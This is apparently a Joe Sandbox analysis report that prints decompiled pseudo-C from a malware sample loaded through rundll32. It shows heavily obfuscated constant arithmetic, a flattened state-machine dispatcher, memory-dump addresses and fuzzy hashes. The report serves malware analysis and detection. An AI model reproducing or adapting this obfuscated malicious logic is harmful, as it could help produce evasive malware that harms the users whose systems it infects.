                                                                                                                    				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                    				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                    				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                    				_v1616 = 0x130067;
                                                                                                                    				_t534 = 0x4e;
                                                                                                                    				_v1616 = _v1616 / _t534;
                                                                                                                    				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                    				_v1628 = 0x10552;
                                                                                                                    				_v1628 = _v1628 + 0xf3cd;
                                                                                                                    				_v1628 = _v1628 + 0x9e6e;
                                                                                                                    				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                    				_v1636 = 0x95cc92;
                                                                                                                    				_v1636 = _v1636 >> 0xf;
                                                                                                                    				_v1636 = _v1636 + 0x9761;
                                                                                                                    				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                    				_v1748 = 0xd7b406;
                                                                                                                    				_t535 = 0x31;
                                                                                                                    				_v1748 = _v1748 * 0x46;
                                                                                                                    				_v1748 = _v1748 << 1;
                                                                                                                    				_v1748 = _v1748 + 0x479a;
                                                                                                                    				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                    				_v1584 = 0xe29275;
                                                                                                                    				_v1584 = _v1584 * 0x6d;
                                                                                                                    				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                    				_v1664 = 0xc2b99a;
                                                                                                                    				_v1664 = _v1664 / _t605;
                                                                                                                    				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                    				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                    				_v1692 = 0xa5d2da;
                                                                                                                    				_v1692 = _v1692 * 0x17;
                                                                                                                    				_v1692 = _v1692 / _t535;
                                                                                                                    				_t536 = 0x23;
                                                                                                                    				_v1692 = _v1692 * 0x3a;
                                                                                                                    				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                    				_v1656 = 0x680db3;
                                                                                                                    				_v1656 = _v1656 >> 6;
                                                                                                                    				_v1656 = _v1656 >> 5;
                                                                                                                    				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                    				_v1728 = 0x12970f;
                                                                                                                    				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                    				_v1728 = _v1728 >> 6;
                                                                                                                    				_v1728 = _v1728 / _t536;
                                                                                                                    				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                    				_v1620 = 0xa87d1b;
                                                                                                                    				_v1620 = _v1620 + 0xc3ba;
                                                                                                                    				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                    				_v1736 = 0xb206b7;
                                                                                                                    				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                    				_t537 = 0x5d;
                                                                                                                    				_v1736 = _v1736 / _t537;
                                                                                                                    				_v1736 = _v1736 + 0x173b;
                                                                                                                    				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                    				_v1744 = 0xbf67a7;
                                                                                                                    				_t538 = 0x70;
                                                                                                                    				_v1744 = _v1744 / _t538;
                                                                                                                    				_v1744 = _v1744 | 0x1279871b;
                                                                                                                    				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                    				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                    				_v1588 = 0x7bc48a;
                                                                                                                    				_v1588 = _v1588 << 7;
                                                                                                                    				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                    				_v1688 = 0x5dc5eb;
                                                                                                                    				_v1688 = _v1688 >> 0xb;
                                                                                                                    				_v1688 = _v1688 + 0xaf87;
                                                                                                                    				_t539 = 0x6c;
                                                                                                                    				_t522 = _v1568;
                                                                                                                    				_v1688 = _v1688 * 0x63;
                                                                                                                    				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                    				_v1696 = 0x311285;
                                                                                                                    				_v1696 = _v1696 << 0xb;
                                                                                                                    				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                    				_v1696 = _v1696 / _t539;
                                                                                                                    				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                    				_v1592 = 0x977507;
                                                                                                                    				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                    				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t540 = 0x5c;
                                                                                                                    					while(1) {
                                                                                                                    						L2:
                                                                                                                    						_t500 = 0x8167d85;
                                                                                                                    						do {
                                                                                                                    							L3:
                                                                                                                    							if(_t603 == 0x2c7b186) {
                                                                                                                    								E00331FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                    								_t603 = 0xcf98960;
                                                                                                                    								goto L18;
                                                                                                                    							} else {
                                                                                                                    								if(_t603 == 0x33b45b1) {
                                                                                                                    									_push(_v1680);
                                                                                                                    									_push(_v1720);
                                                                                                                    									_t502 = E0034DCF7(_v1684, 0x331080, __eflags);
                                                                                                                    									_pop(_t546);
                                                                                                                    									__eflags = E0033AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                    									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                    									E0033A8B0(_v1628, _t502, _v1636);
                                                                                                                    									_t609 =  &(_t609[0xf]);
                                                                                                                    									L18:
                                                                                                                    									_t500 = 0x8167d85;
                                                                                                                    									_t540 = 0x5c;
                                                                                                                    								} else {
                                                                                                                    									if(_t603 == _t500) {
                                                                                                                    										_t509 = E0033F002(2 + E0033CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0033CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                    										_t609 =  &(_t609[0xd]);
                                                                                                                    										__eflags = _t509;
                                                                                                                    										_t603 = 0x2c7b186;
                                                                                                                    										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                    										goto L1;
                                                                                                                    									} else {
                                                                                                                    										if(_t603 == 0x9805d0a) {
                                                                                                                    											_push(_v1672);
                                                                                                                    											_push(_v1648);
                                                                                                                    											_push(_v1580);
                                                                                                                    											_push( &_v520);
                                                                                                                    											E003446BB(_v1596, _v1724);
                                                                                                                    											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                    											_t603 = 0xc81d40c;
                                                                                                                    											while(1) {
                                                                                                                    												L1:
                                                                                                                    												_t540 = 0x5c;
                                                                                                                    												goto L2;
                                                                                                                    											}
                                                                                                                    										} else {
                                                                                                                    											if(_t603 == 0xaea35f7) {
                                                                                                                    												_t523 =  *0x353e10; // 0x0
                                                                                                                    												_t524 = _t523 + 0x1c;
                                                                                                                    												while(1) {
                                                                                                                    													__eflags =  *_t524 - _t540;
                                                                                                                    													if(__eflags == 0) {
                                                                                                                    														break;
                                                                                                                    													}
                                                                                                                    													_t524 = _t524 + 2;
                                                                                                                    													__eflags = _t524;
                                                                                                                    												}
                                                                                                                    												_t522 = _t524 + 2;
                                                                                                                    												_t603 = 0x33b45b1;
                                                                                                                    												goto L2;
                                                                                                                    											} else {
                                                                                                                    												_t618 = _t603 - 0xc81d40c;
                                                                                                                    												if(_t603 == 0xc81d40c) {
                                                                                                                    													_push(_v1612);
                                                                                                                    													_push(_v1572);
                                                                                                                    													_t513 = E0034DCF7(_v1624, 0x331020, _t618);
                                                                                                                    													E0034176B( &_v1040, _t618);
                                                                                                                    													_t556 =  *0x353e10; // 0x0
                                                                                                                    													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                    													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                    													E00341652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                    													E0033A8B0(_v1604, _t513, _v1576);
                                                                                                                    													_t609 =  &(_t609[0xf]);
                                                                                                                    													_t603 = 0xaea35f7;
                                                                                                                    													while(1) {
                                                                                                                    														L1:
                                                                                                                    														_t540 = 0x5c;
                                                                                                                    														L2:
                                                                                                                    														_t500 = 0x8167d85;
                                                                                                                    														goto L3;
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							__eflags = _t603 - 0xcf98960;
                                                                                                                    						} while (__eflags != 0);
                                                                                                                    						return _v1568;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x003502d3
                                                                                                                    0x003502d9
                                                                                                                    0x003502e1
                                                                                                                    0x003502e9
                                                                                                                    0x003502f1
                                                                                                                    0x003502f9
                                                                                                                    0x00350305
                                                                                                                    0x00350308
                                                                                                                    0x0035030c
                                                                                                                    0x00350314
                                                                                                                    0x0035031c
                                                                                                                    0x00350324
                                                                                                                    0x0035032c
                                                                                                                    0x00350331
                                                                                                                    0x00350339
                                                                                                                    0x00350341
                                                                                                                    0x0035034c
                                                                                                                    0x00350357
                                                                                                                    0x00350362
                                                                                                                    0x0035036d
                                                                                                                    0x00350378
                                                                                                                    0x00350383
                                                                                                                    0x00350390
                                                                                                                    0x00350399
                                                                                                                    0x0035039d
                                                                                                                    0x003503a5
                                                                                                                    0x003503ad
                                                                                                                    0x003503b7
                                                                                                                    0x003503bb
                                                                                                                    0x003503c3
                                                                                                                    0x003503cb
                                                                                                                    0x003503d3
                                                                                                                    0x003503d8
                                                                                                                    0x003503dd
                                                                                                                    0x003503e5
                                                                                                                    0x003503ed
                                                                                                                    0x003503f2
                                                                                                                    0x003503f7
                                                                                                                    0x003503ff
                                                                                                                    0x0035040a
                                                                                                                    0x00350415
                                                                                                                    0x00350422
                                                                                                                    0x0035042a
                                                                                                                    0x0035042f
                                                                                                                    0x00350434
                                                                                                                    0x0035043c
                                                                                                                    0x00350444
                                                                                                                    0x0035044c
                                                                                                                    0x00350454
                                                                                                                    0x0035045c
                                                                                                                    0x00350464
                                                                                                                    0x0035046c
                                                                                                                    0x00350471
                                                                                                                    0x00350479
                                                                                                                    0x00350481
                                                                                                                    0x00350489
                                                                                                                    0x00350491
                                                                                                                    0x00350499
                                                                                                                    0x003504a1
                                                                                                                    0x003504b5
                                                                                                                    0x003504ba
                                                                                                                    0x003504c1
                                                                                                                    0x003504cc
                                                                                                                    0x003504d7
                                                                                                                    0x003504e2
                                                                                                                    0x003504ed
                                                                                                                    0x003504f8
                                                                                                                    0x00350503
                                                                                                                    0x0035050b
                                                                                                                    0x00350516
                                                                                                                    0x00350521
                                                                                                                    0x00350530
                                                                                                                    0x00350533
                                                                                                                    0x00350537
                                                                                                                    0x0035053b
                                                                                                                    0x00350543
                                                                                                                    0x0035054b
                                                                                                                    0x0035055e
                                                                                                                    0x00350565
                                                                                                                    0x00350570
                                                                                                                    0x00350580
                                                                                                                    0x00350584
                                                                                                                    0x0035058c
                                                                                                                    0x00350594
                                                                                                                    0x003505a1
                                                                                                                    0x003505ad
                                                                                                                    0x003505b6
                                                                                                                    0x003505b7
                                                                                                                    0x003505bb
                                                                                                                    0x003505c3
                                                                                                                    0x003505cb
                                                                                                                    0x003505d0
                                                                                                                    0x003505d5
                                                                                                                    0x003505dd
                                                                                                                    0x003505e5
                                                                                                                    0x003505ed
                                                                                                                    0x003505f8
                                                                                                                    0x003505fc
                                                                                                                    0x00350604
                                                                                                                    0x0035060f
                                                                                                                    0x0035061a
                                                                                                                    0x00350625
                                                                                                                    0x0035062d
                                                                                                                    0x00350642
                                                                                                                    0x00350647
                                                                                                                    0x0035064d
                                                                                                                    0x00350655
                                                                                                                    0x0035065d
                                                                                                                    0x00350669
                                                                                                                    0x0035066e
                                                                                                                    0x00350674
                                                                                                                    0x0035067c
                                                                                                                    0x00350684
                                                                                                                    0x0035068c
                                                                                                                    0x00350697
                                                                                                                    0x0035069f
                                                                                                                    0x003506aa
                                                                                                                    0x003506b2
                                                                                                                    0x003506b7
                                                                                                                    0x003506c4
                                                                                                                    0x003506c5
                                                                                                                    0x003506cc
                                                                                                                    0x003506d0
                                                                                                                    0x003506d8
                                                                                                                    0x003506e0
                                                                                                                    0x003506e5
                                                                                                                    0x003506f3
                                                                                                                    0x003506f7
                                                                                                                    0x003506ff
                                                                                                                    0x0035070a
                                                                                                                    0x00350715
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00350728
                                                                                                                    0x00350728
                                                                                                                    0x0035072e
                                                                                                                    0x0035098a
                                                                                                                    0x00350991
                                                                                                                    0x00000000
                                                                                                                    0x00350734
                                                                                                                    0x0035073a
                                                                                                                    0x003508ea
                                                                                                                    0x003508f3
                                                                                                                    0x003508fb
                                                                                                                    0x00350901
                                                                                                                    0x0035095c
                                                                                                                    0x00350967
                                                                                                                    0x0035096a
                                                                                                                    0x0035096f
                                                                                                                    0x00350993
                                                                                                                    0x00350995
                                                                                                                    0x0035099a
                                                                                                                    0x00350740
                                                                                                                    0x00350742
                                                                                                                    0x003508ca
                                                                                                                    0x003508d1
                                                                                                                    0x003508d4
                                                                                                                    0x003508d6
                                                                                                                    0x003508de
                                                                                                                    0x00000000
                                                                                                                    0x00350748
                                                                                                                    0x0035074e
                                                                                                                    0x00350831
                                                                                                                    0x0035083c
                                                                                                                    0x00350840
                                                                                                                    0x00350855
                                                                                                                    0x00350856
                                                                                                                    0x0035085b
                                                                                                                    0x0035085e
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00000000
                                                                                                                    0x00350722
                                                                                                                    0x00350754
                                                                                                                    0x0035075a
                                                                                                                    0x00350811
                                                                                                                    0x00350817
                                                                                                                    0x0035081f
                                                                                                                    0x0035081f
                                                                                                                    0x00350822
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0035081c
                                                                                                                    0x0035081c
                                                                                                                    0x0035081c
                                                                                                                    0x00350824
                                                                                                                    0x00350827
                                                                                                                    0x00000000
                                                                                                                    0x00350760
                                                                                                                    0x00350760
                                                                                                                    0x00350766
                                                                                                                    0x0035076c
                                                                                                                    0x00350778
                                                                                                                    0x00350786
                                                                                                                    0x00350794
                                                                                                                    0x003507cb
                                                                                                                    0x003507d8
                                                                                                                    0x003507dc
                                                                                                                    0x003507ea
                                                                                                                    0x003507ff
                                                                                                                    0x00350804
                                                                                                                    0x00350807
                                                                                                                    0x00350720
                                                                                                                    0x00350720
                                                                                                                    0x00350722
                                                                                                                    0x00350723
                                                                                                                    0x00350723
                                                                                                                    0x00000000
                                                                                                                    0x00350723
                                                                                                                    0x00350720
                                                                                                                    0x00350766
                                                                                                                    0x0035075a
                                                                                                                    0x0035074e
                                                                                                                    0x00350742
                                                                                                                    0x0035073a
                                                                                                                    0x0035099b
                                                                                                                    0x0035099b
                                                                                                                    0x003509b4
                                                                                                                    0x003509b4
                                                                                                                    0x00350723

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Agz$DWK$E+A$g$pw
                                                                                                                    • API String ID: 0-1474679353
                                                                                                                    • Opcode ID: 14fc4580d7fdcb98b70a43224875a21b3a91f65eb026500cfb29d9138491ddf3
                                                                                                                    • Instruction ID: c71b5c30ba34f9f43b9548b6a7830961d68ce1dc315b64f60a5750d9afc51158
                                                                                                                    • Opcode Fuzzy Hash: 14fc4580d7fdcb98b70a43224875a21b3a91f65eb026500cfb29d9138491ddf3
                                                                                                                    • Instruction Fuzzy Hash: 5032137150C3808FD369CF25C98AA8BFBF2BBC4748F10891DE5998A261D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E0033F09B(void* __ecx) {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				char _v2080;
                                                                                                                    				char _v2600;
                                                                                                                    				signed int _v2604;
                                                                                                                    				signed int _v2608;
                                                                                                                    				signed int _v2612;
                                                                                                                    				signed int _v2616;
                                                                                                                    				signed int _v2620;
                                                                                                                    				signed int _v2624;
                                                                                                                    				signed int _v2628;
                                                                                                                    				signed int _v2632;
                                                                                                                    				signed int _v2636;
                                                                                                                    				signed int _v2640;
                                                                                                                    				signed int _v2644;
                                                                                                                    				signed int _v2648;
                                                                                                                    				signed int _v2652;
                                                                                                                    				signed int _v2656;
                                                                                                                    				signed int _v2660;
                                                                                                                    				signed int _v2664;
                                                                                                                    				signed int _v2668;
                                                                                                                    				signed int _v2672;
                                                                                                                    				signed int _v2676;
                                                                                                                    				signed int _v2680;
                                                                                                                    				signed int _v2684;
                                                                                                                    				signed int _v2688;
                                                                                                                    				signed int _v2692;
                                                                                                                    				signed int _v2696;
                                                                                                                    				signed int _v2700;
                                                                                                                    				signed int _v2704;
                                                                                                                    				signed int _v2708;
                                                                                                                    				signed int _v2712;
                                                                                                                    				signed int _v2716;
                                                                                                                    				signed int _v2720;
                                                                                                                    				signed int _v2724;
                                                                                                                    				signed int _v2728;
                                                                                                                    				signed int _v2732;
                                                                                                                    				signed int _v2736;
                                                                                                                    				signed int _v2740;
                                                                                                                    				signed int _v2744;
                                                                                                                    				signed int _v2748;
                                                                                                                    				signed int _v2752;
                                                                                                                    				signed int _v2756;
                                                                                                                    				signed int _v2760;
                                                                                                                    				signed int _v2764;
                                                                                                                    				signed int _v2768;
                                                                                                                    				signed int _v2772;
                                                                                                                    				signed int _t425;
                                                                                                                    				signed int _t443;
                                                                                                                    				signed int _t444;
                                                                                                                    				signed int _t445;
                                                                                                                    				signed int _t446;
                                                                                                                    				signed int _t447;
                                                                                                                    				signed int _t448;
                                                                                                                    				signed int _t449;
                                                                                                                    				signed int _t450;
                                                                                                                    				signed int _t451;
                                                                                                                    				signed int _t452;
                                                                                                                    				signed int _t453;
                                                                                                                    				signed int _t458;
                                                                                                                    				void* _t502;
                                                                                                                    				void* _t503;
                                                                                                                    				signed int* _t507;
                                                                                                                    
                                                                                                                    				_t507 =  &_v2772;
                                                                                                                    				_v2628 = 0x98f0ce;
                                                                                                                    				_v2628 = _v2628 >> 0xb;
                                                                                                                    				_v2628 = _v2628 ^ 0x00001337;
                                                                                                                    				_v2696 = 0x96ddc1;
                                                                                                                    				_v2696 = _v2696 + 0xffff0eed;
                                                                                                                    				_v2696 = _v2696 + 0xffffc9f2;
                                                                                                                    				_v2696 = _v2696 ^ 0x009155bb;
                                                                                                                    				_v2748 = 0x5205ca;
                                                                                                                    				_v2748 = _v2748 ^ 0x19402ba5;
                                                                                                                    				_t502 = __ecx;
                                                                                                                    				_t503 = 0xea1969c;
                                                                                                                    				_t443 = 0x43;
                                                                                                                    				_v2748 = _v2748 / _t443;
                                                                                                                    				_t444 = 0xb;
                                                                                                                    				_v2748 = _v2748 / _t444;
                                                                                                                    				_v2748 = _v2748 ^ 0x000a2456;
                                                                                                                    				_v2604 = 0x2f1706;
                                                                                                                    				_t445 = 0x26;
                                                                                                                    				_v2604 = _v2604 * 6;
                                                                                                                    				_v2604 = _v2604 ^ 0x011fcdd9;
                                                                                                                    				_v2684 = 0x108800;
                                                                                                                    				_v2684 = _v2684 >> 0xc;
                                                                                                                    				_v2684 = _v2684 / _t445;
                                                                                                                    				_v2684 = _v2684 ^ 0x00056909;
                                                                                                                    				_v2764 = 0x56ac6f;
                                                                                                                    				_v2764 = _v2764 << 0xe;
                                                                                                                    				_v2764 = _v2764 | 0x24a96f4c;
                                                                                                                    				_t446 = 0x42;
                                                                                                                    				_v2764 = _v2764 / _t446;
                                                                                                                    				_v2764 = _v2764 ^ 0x02abe6d6;
                                                                                                                    				_v2680 = 0xb60c61;
                                                                                                                    				_t447 = 0x16;
                                                                                                                    				_v2680 = _v2680 / _t447;
                                                                                                                    				_v2680 = _v2680 << 7;
                                                                                                                    				_v2680 = _v2680 ^ 0x04229d93;
                                                                                                                    				_v2712 = 0x6d1dcd;
                                                                                                                    				_v2712 = _v2712 | 0x18b294c6;
                                                                                                                    				_v2712 = _v2712 ^ 0xf88c4d23;
                                                                                                                    				_v2712 = _v2712 ^ 0xe07332c4;
                                                                                                                    				_v2612 = 0x9fb2e7;
                                                                                                                    				_v2612 = _v2612 | 0xd190ff6b;
                                                                                                                    				_v2612 = _v2612 ^ 0xd1908c6f;
                                                                                                                    				_v2732 = 0x85d89e;
                                                                                                                    				_v2732 = _v2732 << 5;
                                                                                                                    				_v2732 = _v2732 >> 0xd;
                                                                                                                    				_t448 = 0x37;
                                                                                                                    				_v2732 = _v2732 / _t448;
                                                                                                                    				_v2732 = _v2732 ^ 0x0009f3db;
                                                                                                                    				_v2704 = 0x8a2dac;
                                                                                                                    				_v2704 = _v2704 << 0xd;
                                                                                                                    				_v2704 = _v2704 * 6;
                                                                                                                    				_v2704 = _v2704 ^ 0xa2425f92;
                                                                                                                    				_v2620 = 0x8530c4;
                                                                                                                    				_v2620 = _v2620 | 0x7f36b61d;
                                                                                                                    				_v2620 = _v2620 ^ 0x7fb2adaf;
                                                                                                                    				_v2756 = 0xf61f4c;
                                                                                                                    				_v2756 = _v2756 >> 0xe;
                                                                                                                    				_t449 = 0x4b;
                                                                                                                    				_v2756 = _v2756 / _t449;
                                                                                                                    				_v2756 = _v2756 + 0xffffd188;
                                                                                                                    				_v2756 = _v2756 ^ 0xfff88f11;
                                                                                                                    				_v2660 = 0x7ee31b;
                                                                                                                    				_v2660 = _v2660 | 0xd8d04f1e;
                                                                                                                    				_v2660 = _v2660 ^ 0xd8ffeb88;
                                                                                                                    				_v2672 = 0xc71ff5;
                                                                                                                    				_v2672 = _v2672 >> 0xf;
                                                                                                                    				_v2672 = _v2672 ^ 0x000b63b3;
                                                                                                                    				_v2740 = 0x49f4c1;
                                                                                                                    				_t450 = 0x76;
                                                                                                                    				_v2740 = _v2740 * 0x4b;
                                                                                                                    				_v2740 = _v2740 + 0xffff254a;
                                                                                                                    				_v2740 = _v2740 * 0x48;
                                                                                                                    				_v2740 = _v2740 ^ 0x17c5e1bd;
                                                                                                                    				_v2652 = 0x2197ca;
                                                                                                                    				_v2652 = _v2652 * 0x5a;
                                                                                                                    				_v2652 = _v2652 ^ 0x0bc440cb;
                                                                                                                    				_v2720 = 0x771a3f;
                                                                                                                    				_v2720 = _v2720 >> 0xe;
                                                                                                                    				_v2720 = _v2720 + 0x9ab6;
                                                                                                                    				_v2720 = _v2720 ^ 0x0000c33a;
                                                                                                                    				_v2688 = 0x2271c;
                                                                                                                    				_v2688 = _v2688 / _t450;
                                                                                                                    				_v2688 = _v2688 << 9;
                                                                                                                    				_v2688 = _v2688 ^ 0x0000f5c5;
                                                                                                                    				_v2608 = 0xceafd9;
                                                                                                                    				_t451 = 0x5b;
                                                                                                                    				_v2608 = _v2608 / _t451;
                                                                                                                    				_v2608 = _v2608 ^ 0x00020c5c;
                                                                                                                    				_v2644 = 0x474c12;
                                                                                                                    				_v2644 = _v2644 + 0xffff00ab;
                                                                                                                    				_v2644 = _v2644 ^ 0x00446b0a;
                                                                                                                    				_v2760 = 0xca1d14;
                                                                                                                    				_t452 = 0x36;
                                                                                                                    				_v2760 = _v2760 / _t452;
                                                                                                                    				_v2760 = _v2760 ^ 0x098f5074;
                                                                                                                    				_v2760 = _v2760 ^ 0x8a27b7fe;
                                                                                                                    				_v2760 = _v2760 ^ 0x83afe7c4;
                                                                                                                    				_v2636 = 0x5d1272;
                                                                                                                    				_v2636 = _v2636 + 0xf4cf;
                                                                                                                    				_v2636 = _v2636 ^ 0x005057cd;
                                                                                                                    				_v2768 = 0x30e751;
                                                                                                                    				_v2768 = _v2768 | 0xcda5a365;
                                                                                                                    				_t453 = 5;
                                                                                                                    				_v2768 = _v2768 * 0x7d;
                                                                                                                    				_v2768 = _v2768 + 0xffff52f5;
                                                                                                                    				_v2768 = _v2768 ^ 0x71df24ad;
                                                                                                                    				_v2772 = 0x3d9f4c;
                                                                                                                    				_v2772 = _v2772 / _t453;
                                                                                                                    				_v2772 = _v2772 | 0x64d73223;
                                                                                                                    				_v2772 = _v2772 >> 2;
                                                                                                                    				_v2772 = _v2772 ^ 0x1935e4e1;
                                                                                                                    				_v2744 = 0xaeb35;
                                                                                                                    				_v2744 = _v2744 << 0x10;
                                                                                                                    				_v2744 = _v2744 + 0xffff2953;
                                                                                                                    				_v2744 = _v2744 + 0xffff82ad;
                                                                                                                    				_v2744 = _v2744 ^ 0xeb3966f5;
                                                                                                                    				_v2752 = 0x66dc67;
                                                                                                                    				_v2752 = _v2752 + 0x90a4;
                                                                                                                    				_v2752 = _v2752 + 0x6fc1;
                                                                                                                    				_v2752 = _v2752 ^ 0x6a9d4e17;
                                                                                                                    				_v2752 = _v2752 ^ 0x6af88c69;
                                                                                                                    				_v2716 = 0xce0c89;
                                                                                                                    				_v2716 = _v2716 ^ 0x42dcf22f;
                                                                                                                    				_v2716 = _v2716 | 0xbb0a480d;
                                                                                                                    				_v2716 = _v2716 ^ 0xfb186e5d;
                                                                                                                    				_v2616 = 0x5746b3;
                                                                                                                    				_v2616 = _v2616 | 0xa6a5976e;
                                                                                                                    				_v2616 = _v2616 ^ 0xa6f469a2;
                                                                                                                    				_v2708 = 0xa6d434;
                                                                                                                    				_v2708 = _v2708 << 0xa;
                                                                                                                    				_v2708 = _v2708 | 0x1b169a68;
                                                                                                                    				_v2708 = _v2708 ^ 0x9b5e88e0;
                                                                                                                    				_v2736 = 0x9f8594;
                                                                                                                    				_v2736 = _v2736 + 0xffffc5c7;
                                                                                                                    				_t454 = 9;
                                                                                                                    				_v2736 = _v2736 / _t454;
                                                                                                                    				_v2736 = _v2736 + 0xffff650c;
                                                                                                                    				_v2736 = _v2736 ^ 0x001c27e2;
                                                                                                                    				_v2668 = 0xeff616;
                                                                                                                    				_v2668 = _v2668 << 4;
                                                                                                                    				_v2668 = _v2668 ^ 0x0efcbcf0;
                                                                                                                    				_v2640 = 0x84564;
                                                                                                                    				_v2640 = _v2640 >> 9;
                                                                                                                    				_v2640 = _v2640 ^ 0x00099447;
                                                                                                                    				_v2648 = 0xb94e9c;
                                                                                                                    				_v2648 = _v2648 >> 7;
                                                                                                                    				_v2648 = _v2648 ^ 0x000c8381;
                                                                                                                    				_v2656 = 0x4f0029;
                                                                                                                    				_v2656 = _v2656 * 0x26;
                                                                                                                    				_v2656 = _v2656 ^ 0x0bb68559;
                                                                                                                    				_v2700 = 0xc64297;
                                                                                                                    				_v2700 = _v2700 << 0x10;
                                                                                                                    				_v2700 = _v2700 ^ 0xb6f38c4d;
                                                                                                                    				_v2700 = _v2700 ^ 0xf46a369f;
                                                                                                                    				_v2664 = 0x51e71d;
                                                                                                                    				_v2664 = _v2664 * 0xf;
                                                                                                                    				_v2664 = _v2664 ^ 0x04c73adc;
                                                                                                                    				_v2728 = 0xfedaba;
                                                                                                                    				_v2728 = _v2728 + 0xfffff930;
                                                                                                                    				_v2728 = _v2728 + 0xfffff3b0;
                                                                                                                    				_v2728 = _v2728 + 0xffff7b6e;
                                                                                                                    				_v2728 = _v2728 ^ 0x00f92d7b;
                                                                                                                    				_v2632 = 0xc4e34f;
                                                                                                                    				_t425 = _v2632 * 0x17;
                                                                                                                    				_v2632 = _t425;
                                                                                                                    				_v2632 = _v2632 ^ 0x11b64b79;
                                                                                                                    				_v2676 = 0x4fbb37;
                                                                                                                    				_v2676 = _v2676 + 0x433;
                                                                                                                    				_v2676 = _v2676 >> 1;
                                                                                                                    				_v2676 = _v2676 ^ 0x002442b0;
                                                                                                                    				_v2724 = 0xe01143;
                                                                                                                    				_v2724 = _v2724 | 0x0dc37ba2;
                                                                                                                    				_v2724 = _v2724 + 0xe020;
                                                                                                                    				_v2724 = _v2724 ^ 0x0dec213c;
                                                                                                                    				_v2624 = 0xd4ff52;
                                                                                                                    				_v2624 = _v2624 << 0xe;
                                                                                                                    				_v2624 = _v2624 ^ 0x3fd02267;
                                                                                                                    				_v2692 = 0xfd19e6;
                                                                                                                    				_v2692 = _v2692 + 0x8b9c;
                                                                                                                    				_v2692 = _v2692 | 0x5cbd23eb;
                                                                                                                    				_v2692 = _v2692 ^ 0x5cf129d9;
                                                                                                                    				while(_t503 != 0x5de06da) {
                                                                                                                    					if(_t503 == 0xea1969c) {
                                                                                                                    						_t503 = 0xfa9128f;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						_t515 = _t503 - 0xfa9128f;
                                                                                                                    						if(_t503 != 0xfa9128f) {
                                                                                                                    							L8:
                                                                                                                    							__eflags = _t503 - 0xa8e801c;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							E0034DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
                                                                                                                    							 *((short*)(E0033B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
                                                                                                                    							E00338969(_v2612,  &_v1560, _t515, _v2732, _v2704);
                                                                                                                    							_push(_v2660);
                                                                                                                    							_push(_v2756);
